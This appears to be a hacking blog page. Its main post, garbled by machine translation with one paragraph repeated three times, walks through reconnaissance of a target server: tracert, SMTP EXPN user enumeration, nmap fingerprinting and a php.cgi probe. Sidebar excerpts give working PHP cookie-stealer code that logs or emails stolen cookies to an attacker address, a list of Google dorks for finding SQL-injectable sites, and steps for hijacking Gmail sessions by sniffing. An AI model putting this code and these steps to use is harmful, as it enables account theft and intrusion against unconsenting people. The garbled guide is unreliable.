The begining


Identify a target: To fight an enemy must be known. The same goes for a hack, we'll have to get a certain amount of information (as much as possible for that matter) on the machine that the hacker wants to have, we will call the machine "target". For that it has a lot of tools. All will not apply to all machines because their security level differs, and some will be ineffective. I talked to a lot of these tools in different sections of this website so I did not speak again of ones, I would cite the fair and a link to the article. But do not worry I give enough information for you to understand and you can start to experiment a bit. There is not talking about crappy hack to the BO (Back Orifice) or some other moles and Trojans. Here is the hack servers it comes more from pc grandmother under Win9x. The risks are truly starting for you here but as I imagine you are aware, we will start. In this article I do not give precise address server like I did for the hack ftp because it still would restore instead to abuse. So the server will be one of the box "assassin" and DNS (domain name service) will http://www.assassin.com/. All manipulation that I explain in this article will be carried out under Windows, but are very good (I've heard better in the room?) Linux commands only differ and I will not explain here. I will briefly return to the differences between the IP addresses, DNS and URL. All servers have an IP address (and yeah because the definition of a server is a computer connected to a network and other computers that can see the one) except when they are not connected. For the precise definition of the IP address I refer you to the article I wrote above. A DNS address is an address like: http: .... I wrote because it depends not www DNS addresses there that do not have DNS but that start with something kind or http://perso.infonie.fr ww2 or www3 ... It is true that it is easier to remember than 167.34.217.65 www.assassin.com. For a DNS address, the company that owns the server has to pay a sum between 500 and 1,000 francs to an organization responsible for assigning these addresses and blunder that two different servers do not use two identical. Finally a URL that is the two things mentioned above. There is talk of URL address to specify to someone that it is the address of a server through port 80 (the port used for www, web pages what) we're talking about, not a email address. So when you ask the URL of a site generally you get the DNS address but may well give you ip ca not change anything for you.Because of course if you type the ip of a server in netscape or DNS address you will come to the same pages. Sub course this server reserve has well a website. Now that this is clarified we will return to the heart of our business. With a DNS address can not we do anything, we will have the ip address of the server and for that we are going to ping. For that you type in the back: ping -a www.assassin.com and it'll give you his ip :-) and the quality of the connection and the speed of the connection but that we do not care a bit I must say . Now we will see how there machines between us and the murderer server. For that several methods. Or you use a prog genre visual way (paying the last I heard) or NeoTrace or others and then used a dos command called tracert. The progs I can not explain how they work, it's super simple and they have the advantage of being graphic but for those who prefer the text lines is the back option for you. Besides I explain quickly and even if you are a fan of programs I guess you have nothing against a bit of general culture: So back under you type: tracert url_du_serveurexample: 167.34.217.65 or tracert tracert www.assassin.com (both work) If there marked "host unreachable" is that you have copied the wrong ip previously found or the URL or the server is no longer connected. All machines lying between you and the target server will mark their ip. Note that in a corner or take a screen capture (print screen). The last marked IP will be that of the target. And if just before that of the target has the same three numbers as your target is the target that you are trying to attack you is most likely secure. It'll be funny.Language neophyte is that there was a machine located on the LAN (a LAN is the line between the internal network and the external network) between the target machine and the Internet and which ensures its protection. That is to say that the system administrator has invested in a machine (there may be even more) that serves only the security and nothing else. It's either a firewall or a filtering router is a bastion or a bunker or a firewall or a proxy or I do not know what other crap like that :-). If such a machine placed on the LAN does not exist when you made ​​the tracert that's not why a similar protection is not included in the assassin server itself (this is almost always the If that matter) but generally it's a pretty reliable index of the safety level of a network. If you read the article about the ip you know that the first three numbers of an ip correspond to a domain and the last number corresponds to a machine of this network. In this example the domain is 167.34.217 since the assassin server ip is 167.34.217.65 and the machine is the "item" 65. In the vast majority of cases (as I say, all) there are several machines in the same area and it must have a number of "post" between 0 and 255. Of course there are areas that have more than 256 servers connected to each other and in this case they have either several areas related to the Internet ( in the case of AOL that are hundreds that begin with 162, 171, 172, ...) or have sub networks within areas that are not connected directly to the internet, using the ip can already be used no other servers on the internet but as they have no direct connection to the internet no problem arises. And if they want to connect to the Internet even when they connect to them through a proxy and therefore take the IP of the proxy to get the answers from the Internet or external network.A proxy is a type of firewall that transmits requests between an internal network and an external network but gives no direct contact between two machines (bah yeah safety) and if there was direct contact, the machine would create subnet a conflict of IP as it was recovering from his ip. Complicated stuff? This will be explained in detail in the article about firewalls. It's not anything to you the fact of going through a proxy that did change the ip? And yes spoofing! Arf life is beautiful anyway but this is not we who use it. So cast it your thinking or you'll confuse you for the future. At the moment your ip is not spooffé but it will come. :-) So I said that the assassin server must be connected to other machines in the network and bin to know there are several ways:- The first is to take a program called a scanner to ip and get into the server ip assassin. It will seek all servers with the IP 167.34.217.0 and 167.34.217.255 between content as the target ip is 167.34.217.65. The program will take you out right (hopefully) ip you will notice carefully. - The second is to use an existing mine information over much of the world's servers connected to the Internet and available to all. All servers with a DNS address (and others also can be. Here I know) have identified a number of information such as the number of machines that have access to their server, the size (number of IP or machine ) of their field ... This info is available by telnet mine which means he'll have to start telnet. There are several servers that provide this kind of information, including Internic (whois.internic.net) and Netcraft (www.netcraft.com) but we will return in detail in another article because the possibilities of this research are quite allucinantes. For now just know that it exists. - The third is to do a snmp expn on a network bikes. And if it returns you an email address on a different server but a single domain you will be set. I recall that the SMTP port is 25. You connect to by win or linux and you type: HELO name of the server then once this one you will be greeted in turn you will EXPN ROOT. Of course we need the ROOT login exists because of course the root has not always root login and even far from it. It may even be that the root login is only a user status. Try always EXPN ROOT and see if would this give ca puts "Unknown login" try the other boat used by login as sysop root, admin, ... and if it does nothing and the server you attack has a web page you can try to look for information on the different email on this site. Of course the expn not working for root but for any user. - The fourth is to do a nslookup on a server but it only works on Linux.why do: nslookup www.assassin.com (course in console mode) - The fifth is to do a dig. Also in Linux console mode. Www.assassin.com dig- The last way is to use specific ports such as finger (79) and the whois (43), which, when it is not closed or unusable by a foreign machine are very informative to know which machines and users connected to this machine and their IP and their rights. To find out which ports are open (like ftp, telnet, finger ...) using a port scanner. Of course for a server to know what people are allowed to enter, he has criteria that verifies as login, pass, ip, source port, protocol packets, ... With information we just collected it will be possible to use methods to falsify these criteria and circumvent security. But that's for another article ... Now we will try to see what OS is running on a server. It will help us enormously to know which method to use hack. For that there are also methods PLUSIEUR unfortunately most of the one I know go through linux. We will not even say Linux or die but if one is not a Windows expert (a real expert), there are plenty of things you can not operate without a specific program and the program (I speak here of hackers program Satan kind, nmap, ...) under windows are very rare. It is also obliged to be even linux win conversion program itself or even his own application for that win starts to look like something usable. The means to find out what OS is running a server are many. Here are several ways: - The first is ftp.We will do like the hack and the ftp connection we will see a line that the server will send us to the type of OS they use. This is not an exact science because no server harm remove this line or replacing it with a false or a pub band (secure or commercial :-(). So if you're on windows ca stops there but if you are in Linux, you simply do SYST for more information on the OS server. - the second goes under linux, it comes to do: playground ~ telnet hpux.u-aizu.ac.jp Trying 163.143.103.12 ... . Connected to hpux.u-aizu.ac.jp . Escape character is '^]' HP-UX B.10.01 hpux A 9000/715 (ttyp2) login: (from the American mag Phrack) you can see the version of the OS server (5th line for those who have not seen). - The third method also passes under linux: playground echo 'GET / HTTP / 1.0 \ n "| nc hotbot. com 80 | egrep '^ Server:'Server: Microsoft-IIS / 4.0 playground (always sorted the same zine) - Finally, the last and the best linux still happening because it's using TCP packets sent by a server to find out which server it comes. Indeed the plupars servers have tcp packet layers own managements and therefore different between each server so that by knowing well all versions of all worldwide OS, and by integrating their particularity for protocol packets of referrals TCP, UDP and ICMP even times, the program can almost say with certainty what is the OS that runs on a server. Indeed sending a packet regardless of the protocol (tcp or udp. Icmp being apart because it is only used for the error or redirected back because packets with incorrect header) server alters slightly the packet header without tcp as touching Usefull data for normal users. This alteration will be stored and analyzed. Each differently alter the OS, type and version will immediatly detected. This program is called nmap and is available at the following address:. Http://www.insecure.org/nmap Something that can can also serve you is to put a "=" behind a cgi-bin if the server has a flaw it will give you the version of the OS kernel, scripts ... but generally we need this kind of information before being logged on the bike and this info you do optiendrez that if you have read access via HTTP by the cgi-bin. For example if a server named assassion has cgi php scripts buggy you will just do that. Www.assassin.com/cgi-bin/php.cgi?/= course all the previous steps are not necessary, ie, is rare when all these steps are required but when you can not enter a server directly we try to return to a less secure whom he trusted and that's what serves to know that it communicates behind a cgi-bin if the server has a flaw it will give you the version of the OS kernel, scripts ... but generally we need this kind of information before being logged on the bike and these optiendrez the information you do that if you have read access via HTTP by the cgi-bin.For example if a server named assassion has cgi php scripts buggy you will just do that. Www.assassin.com/cgi-bin/php.cgi?/= course all the previous steps are not necessary, ie, is rare when all these steps are required but when you can not enter a server directly we try to return to a less secure whom he trusted and that's what serves to know that it communicates behind a cgi-bin if the server has a flaw it will give you the version of the OS kernel, scripts ... but generally we need this kind of information before being logged on the bike and these optiendrez the information you do that if you have read access via HTTP by the cgi-bin.For example if a server named assassion has cgi php scripts buggy you will just do that. Www.assassin.com/cgi-bin/php.cgi?/= course all the previous steps are not necessary, ie, is rare when all these steps are required but when you can not enter a server directly we try to return to a less secure whom he trusted and that's what serves to know that it communicates

Comments

Post a Comment

Popular posts from this blog

Create cookie stealer in PHP? get via email

Image
<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()     {         if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown
Read more

Php And Google Dorks 2017

Image
A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=
Read more

Hack A Gmail Account using Packet Sniffer

Image
Whenever someone logs into Gmail (or any other login service), a file called a "cookie" is sent to their computer. This cookie allows the user to stay logged in, even if they leave Gmail. A packet sniffer can find cookies being transferred over a wireless network. When you find a Gmail cookie, you can open it on your computer and potentially access your target's inbox. You'll need to be connected to the same wireless network as your target. Requirement 1. Wireshark 2. Cookie Cadger. Download and install Wireshark. Wireshark is a free network monitoring utility that you can download from wireshark.org. It is available for Windows, Mac, and Linux. Installing Wireshark is a straightforward process. Follow the prompts like you would with most programs. Download Cookie Cadger. This is a Java program that will will find and intercept cookies being sent across the wireless network. Cookie Cadger doesn't need to be installed. It works the same in
Read more